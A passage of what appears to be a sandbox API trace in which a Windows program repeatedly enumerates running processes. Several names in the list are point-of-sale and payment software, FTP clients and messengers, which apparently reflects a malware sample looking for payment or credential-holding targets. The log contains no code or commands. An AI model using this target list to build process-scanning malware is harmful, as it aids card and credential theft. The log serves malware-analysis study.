th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0231.239] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0231.245] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0231.249] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0231.251] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0231.254] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0231.260] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0231.263] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0231.266] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0231.269] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0231.272] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0231.276] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0231.279] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0231.282] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0231.289] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0231.292] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0231.295] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0231.301] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0231.304] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0231.307] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0231.309] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0231.312] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0231.315] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.317] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0231.320] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.322] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.329] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0231.332] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.335] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0231.338] CloseHandle (hObject=0x2254) returned 1 [0231.338] Sleep (dwMilliseconds=0x64) [0231.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1950 [0231.494] Process32First (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.496] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.499] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.501] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.504] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.506] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.508] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.510] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.513] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.555] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.558] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.560] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.563] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.565] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.567] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.569] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.573] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.575] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.578] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.580] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.582] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0231.585] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.587] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0231.589] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.635] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0231.639] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0231.641] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0231.643] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0231.646] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0231.648] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0231.650] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.653] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.656] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0231.658] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.661] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.663] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.665] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.668] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.671] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0231.712] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0231.715] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0231.717] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0231.720] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0231.722] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0231.724] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0231.728] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0231.732] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0231.734] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0231.737] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0231.739] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0231.742] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0231.744] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0231.746] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0231.748] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0231.791] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0231.793] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 